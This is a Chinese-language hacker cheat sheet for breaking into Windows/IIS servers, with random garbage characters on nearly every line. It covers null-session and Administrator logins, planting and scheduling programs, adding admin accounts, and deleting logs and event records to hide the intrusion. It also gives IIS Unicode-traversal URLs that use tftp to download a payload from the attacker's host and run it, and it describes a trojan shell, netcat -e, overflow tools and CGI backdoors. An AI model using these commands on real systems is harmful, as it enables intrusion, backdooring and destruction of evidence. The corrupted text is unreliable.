网管和黑客都必须知道的命令
5<ya�;iK�� 常用的几条NET命令:
1~��iBzPU2 �� �u^�e�C (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
_"e(
^�yiK I3=Sc^zz&V (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
r���3lr`s` #S7�4C�*'8 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
Cr\/<zy1-e y�]z#��?�? (查看远程主机时间) net time \\IP地址
B!C32~[��� 3G�0\i!*t� (定时启动某个程序) at \\IP地址 02:18 readme.exe
�[8g\�pP�Q C4d1*�IQk� (查看共享) net view \\IP地址
��O����p�X HO�I`F3#XI (查看netbios工作组列表) nbtstat -A IP地址
�s�N/Xof�h '�$�nG�tB5 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
��2F�)Oy�E .\\#~r`t�3 (这两条把自己增加到管理员组): net user 用户名 密码 /add
/|^�^v �DL J�x[e{o)�o net localgroup Administrators 用户名 /add
Yy;1�N{dbT Z`h_oK#y15 (断开连接) net use \\IP地址\ipc$ /delete
�\�}&w/.T ��dufHd�� 扫尾:
hzVr3;3Zn
VTkT4C@I;Y del C:\winnt\system32\logfiles\*.*
F>{uB�!!L4 >�R��!I��� del C:\winnt\ssytem32\config\*.evt
:�<G+)h�IK Gi_��X+os� del C:\winnt\system32\dtclog\*.*
~x#�-#nuh" t-{OP?c�E1 del C:\winnt\system32\*.log
jS)-COk�� )n6�1Iqr�W del C:\winnt\system32\*.txt
Q�LLV�OJ�i fO|�u�(�e
del C:\winnt\*.txt
�z>#$#:Z�4 ,(�b~L<zN& del C:\winnt\*.log
Z?[J_[ZtR3 C
5!6k1TcE 一、netsvc.exe
3]82gZG��G [-}%B0�S** 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
e"09b<6�9 "[L�p-4A\ netsvc /list \\IP地址
m/c~2?�-; T>?1+mru�M netsvc schedule \\IP地址 /query
5%�$kAJZC- �<�t2?Oii; netsvc \\IP地址 schedule /start
��Hd}��t=6 ^8t*WphZC� 二、OpenTelnet.exe
vx�,6::%]� @�y�%qQe/g 远程启动主机的Telnet服务,并绑定端口到7878,例如:
��Gs?s�O?j uB9+E%jOdQ OpenTelnet \\IP地址 用户名 密码 1 7878
G!Q)?N ���
c�'4� \F9 然后就可以telnet到主机的7878端口,进入DOS方式下:
�x�?$Y<=vT jDR\�#cGrZ telnet IP地址 7878
�3�5\0g�&� �W�sz9X;�� 三、winshell.exe
rJ*WxOoS{� C!A_P�Q2�y 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�_dY�}86�{ �
Hh/#pGf2 p Path (查看winshell主程序的路径信息)
KWkT
9[�H �~#xRoB�y3 b reBoot (重新启动机器)
Fsd�n2{g8U !�T1i�_�� d shutDown (关闭机器)
�$�:P~21,� ZuON@�(��� s Shell (执行后你就会看到可爱的“C:\>”)
Qp�Z�hx�p P�,�], �N) x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�D�{}�\7qe &Vm�[5X�W CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
.5zJ bZ9� 3<�S�C`6'? 四、3389登陆器,GUI方式登录远程主机的
m)�2U-3*iX -M�9
4 �F 五、elsave.exe
4�df1)<}U- %i�M�L?�?S 事件日志清除工具
~nlY8B��( g9Ll>d)tE3 elsave -s \\IP地址 -l "application" -C
L�32ki}�2� Ou�H]Y�70( elsave -s \\IP地址 -l "system" -C
[! o��-�F; d":{�a6D*d elsave -s \\IP地址 -l "security" -C
�'�f!Jh<i� ;b�bEd'�� 执行后成功清除应用程序日志,系统日志,安全日志
�Mqy`j9FbL Ku# ���_ � 六、hbulot.exe
e$�h�\7i:( 1A
*8Jnw 开启win2kserver和winxp的3389服务
=ye}IpC*�M �k#M W�>�� hbulot [/r]
UJ&,9��}L8 I!bZ-16X�� 使用/r表示安装完成后自动重起目标使设置生效。
y�2>]��gX5 Ve�d:w^
�, 七、nc.exe(netcat.exe)
F!��<x�;h( �8hY)r~!b' 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
G
0 yt%qHE �x]M1UBnMN 想要连接到某处: nc [-options] hostname port[s] [ports] ...
}9dgm[�C[b gr7_�o�J:R 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
&0TheY;srf �;�U4�X
�U 参数:
Hs` ��'](� Sy55��w�={ -e prog 程序重定向,一旦连接,就执行 [危险!!]
:-8u*5QK]` mUw��,q;{� -g gateway source-routing hop point[s], up to 8
�iE5^Xik�, `�V�bG%y&I -G num source-routing pointer: 4, 8, 12, ...
XD�Q1gg`�� YKk%;���U* -h 帮助信息
t~M_NEPx�V �$P~��a��� -i secs 延时的间隔
�:��'=C/AL ���i�=UJ*c -l 监听模式,用于入站连接
��)}v�2Z3: + u+�fEg/A -n 指定数字的IP地址,不能用hostname
��^~od*:�� bHNaaif}�P -o file 记录16进制的传输
~+h�G}7�(: wz�=I�+IN: -p port 本地端口号
X35hLp8 M� h:w�D
&Fh8 -r 任意指定本地及远程端口
c�P�SpPx M`F���L&Ac -s addr 本地源地址
5k�z`�_\�& 4�RNzh``u� -u UDP模式
�^�S��@b*� |C���a��n -v 详细输出——用两个-v可得到更详细的内容
�J�)_��42Z <o
O�_wS@: -w secs timeout的时间
&�iivSc;#� !k^\`jMz�w -z 将输入输出关掉——用于扫描时
'UKB��
pm/ 八、TFTPD32.EXE
,q1�RJ��iR FE.:h'^h 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�B'yrXa|P� 4P�5wEqU.< http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
5M�l}�m��� Rz<fz"/2<� 然后可以直接令文件运行:
#Bjnz�$KB� U�Wp(�3FQ� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
D]REZu�HOI Mt�lj�I6� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
Y`v�&YcX;� %�!�RQ:?=� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
n@f@-d$m\< RY&~{yl$"1 一、一 Xscan命令行运行参数说明:
5{UG�Sz� 1 f32n�O���� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
]���2+�(i� �M�*Xzr .6 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
BH^q.p_#>X �V�Puzu�|� xscan -file <主机列表文件名> <检测项目> [其他选项]
(msJ:�SG�� �&�%�<G2x$ 其中<检测项目> 含义如下:
Om*Dy��}�� �?�p]w��_l -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
(Y86q\DQ?| �fsu'�W]f -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
]v�#Q\Q8>� ��m���b�/Y -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
tfO
�_�b5g 9Z�whC�s�O -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Im�2��g2�] i*3�'O�:Gq -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
a[!�':-R`s �/�$E1!9J� [其他选项] 含义如下:
g"xZ��{k_3 JkTL+�o�bu -v: 显示详细扫描进度
�n:{y�ri+� g�g�=z.`�} -p: 跳过Ping不通的主机
9��8l#+4�+ ���^(y4]yZ -o: 跳过没有检测到开放端口的主机
U}N�Nb�GQj �p-Z5�{by� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
